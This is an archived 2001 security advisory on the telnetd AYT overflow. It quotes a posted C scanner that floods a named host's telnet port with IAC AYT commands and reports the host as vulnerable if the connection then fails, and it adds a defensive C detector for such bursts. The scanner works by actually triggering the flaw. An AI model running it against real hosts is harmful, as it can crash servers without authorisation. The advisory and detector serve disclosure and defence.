Category:   Application (Generic)  >   Telnet
Vendors:   [Multiple Authors/Vendors]
(A Scanner is Released) Re: Telnet Daemons May Give Remote Users Root Level Access Privileges
SecurityTracker Alert ID:  1002081
SecurityTracker URL:
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Jul 25 2001
Impact:   Execution of arbitrary code via network, Root access via network, User access via network

Description:   TESO reported that many BSD-derived Telnet daemons (servers) contain a vulnerability that may allow a remote user to obtain root level access on the server.

A user has posted a utility that will scan for vulnerable systems. The source code is contained in the Source Message. For information on the vulnerability, see the Message History.

Impact:   A remote user can execute arbitrary code on the server with the privileges of the telnet server, which typically runs with root level privileges.
Solution:   No solution was available at the time of this entry.
Cause:   Boundary error
Underlying OS:  Linux (Any), UNIX (Any)
Underlying OS Comments:  Many Linux and Unix OSes are vulnerable, but not all; see the Alert text for more information

Message History:   This archive entry is a follow-up to the message listed below.
Jul 18 2001 Telnet Daemons May Give Remote Users Root Level Access Privileges

 Source Message Contents

Subject:  Telnetd AYT overflow scanner

Content-Disposition: attachment; filename="SPtelnetAYT.c"

/*
 * Telnetd AYT overflow scanner, by Security Point(R)
 *              Bug found by scut of TESO Security
 * Date: 25/07/01
 * Author: Security Point(R)
 * WWW:
 * Email:
 * This program checks for the AYT overflow related to the
 * newly discovered telnetd vulnerabilities.
 * Tested against:
 *	Vulnerable:
 *		netkit-telnet-0.10
 *              FreeBSD 4.2
 *	Not vulnerable:
 *		netkit-telnet-0.17
 * Please keep us updated with the OSes that you check, and
 * report back to us on whether the system
 * is vulnerable or not, so we can construct a full list
 * of vulnerable systems.
 * This source code is for educational purpose ONLY,
 * Security Point(R) will not be responsible for any damages
 * whatsoever that have a connection with this code. There are
 * no warranties with regard to this information.
 * Are your networks under attack at this moment?
 * With Security Point(R) Scanner you can find and repair the
 * Vulnerabilities before the bad guys get in.
 * Please see
 */
#include <stdio.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>
#include <signal.h>
#include <unistd.h>
#include <sys/socket.h>

struct in_addr addr;
struct sockaddr_in address;
struct hostent *host;
int sock;

char sendbuffer[5120*2];
char buffer[5120*2];
int i;
int timeout;

/* SIGALRM handler: record that the timer fired. */
void handle_alarm(int signum) {
    (void)signum;
    timeout = 1;
}

int main (int argc, char *argv[]) {
    printf("Telnetd AYT overflow scanner, by Security Point(R)\n");
    if (argc!=2) {
        printf("Usage: %s <host>\n", argv[0]);
        exit(1);
    }
    printf("Host: %s\n", argv[1]);
    if ((host=gethostbyname(argv[1])) == NULL) {
        fprintf(stderr, "Cannot resolve %s\n", argv[1]);
        exit(1);
    }
    if (( sock = socket(AF_INET, SOCK_STREAM,0)) < 0) {
        perror("socket");
        exit(1);
    }
    address.sin_family = AF_INET;
    memcpy(&address.sin_addr, host->h_addr_list[0], host->h_length);
    address.sin_port = htons(23);  // telnet
    if (connect(sock, (struct sockaddr*)&address, sizeof(address)) < 0) {
        perror("connect");
        exit(1);
    }
    printf("Connected to remote host...\n");
    printf("Sending telnet options... stand by...\n");

    /* Fill the whole send buffer with two-byte IAC AYT commands. */
    for (i=0;i!=(sizeof(sendbuffer)/2);i++) {
        sendbuffer[2*i]   = (char)255; // 0xff - IAC
        sendbuffer[2*i+1] = (char)246; // 0xf6 - AYT
    }
    /* Consume the server's initial option negotiation. */
    read(sock, buffer, sizeof(buffer));

    write(sock, sendbuffer, sizeof(sendbuffer));

    /* A closed or failed connection after the burst is reported as vulnerable. */
    if (read(sock, buffer, sizeof(buffer)) <=0) {
        printf("Telnetd on %s vulnerable\n",argv[1]);
        close(sock);
        exit(0);
    }
    printf("Telnetd on %s not vulnerable\n",argv[1]);
    close(sock);
    return 0;
}
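
From the defender's side, the probe above is easy to recognise on the wire: thousands of back-to-back IAC AYT (0xff 0xf6) commands from the client. The following detector is an added example, not part of the original post or the advisory; `count_ayt`, `is_ayt_burst`, `demo_probe_flagged` and the threshold of 16 are assumptions chosen for illustration, and the sample buffers are constructed.

```c
#include <stddef.h>
#include <stdio.h>
enum { SE = 240, AYT = 246, SB = 250, WILL = 251, DONT = 254, IAC = 255 };
/* Assumed threshold: AYTs per client buffer above which we alert. */
#define AYT_BURST_THRESHOLD 16

/* Count AYT commands in client-to-server telnet bytes (hypothetical helper). */
size_t count_ayt(const unsigned char *p, size_t len)
{
    enum { DATA, GOT_IAC, OPT, SUBNEG, SUBNEG_IAC } st = DATA;
    size_t n = 0;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = p[i];
        switch (st) {
        case DATA:   if (c == IAC) st = GOT_IAC;    break;
        case OPT:    st = DATA;                     break; /* option byte consumed */
        case SUBNEG: if (c == IAC) st = SUBNEG_IAC; break;
        case SUBNEG_IAC:
            if (c == IAC) { st = SUBNEG; break; }   /* escaped 0xff inside SB */
            /* SE ends SB; any other byte is malformed and is parsed as a
             * command, so an AYT cannot hide inside an unterminated SB. */
            /* fall through */
        case GOT_IAC:
            if (c == AYT) n++;
            if (c >= WILL && c <= DONT) st = OPT;   /* WILL/WONT/DO/DONT */
            else if (c == SB)           st = SUBNEG;
            else                        st = DATA;  /* incl. IAC IAC = literal 0xff */
            break;
        }
    }
    return n;
}

int is_ayt_burst(const unsigned char *p, size_t len) { return count_ayt(p, len) > AYT_BURST_THRESHOLD; }

/* Constructed sample: 1024 consecutive IAC AYT pairs, the shape of the probe. */
int demo_probe_flagged(void)
{
    static unsigned char probe[2048];
    for (size_t i = 0; i < sizeof probe; i += 2) { probe[i] = IAC; probe[i + 1] = AYT; }
    return is_ayt_burst(probe, sizeof probe);
}

int main(void)
{
    /* Constructed benign traffic: IAC DO <opt 246>, "ls", escaped 0xff, one real AYT. */
    const unsigned char benign[] = "\xff\xfd\xf6ls\r\n\xff\xff\xf6\xff\xf6";
    printf("benign=%zu probe=%d\n", count_ayt(benign, sizeof benign - 1), demo_probe_flagged());
    return 0;
}
```

The parser state here is per buffer; a monitor watching a live session would keep `st` and the running count across reads so a burst split over several segments is still counted.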




Copyright 2019, LLC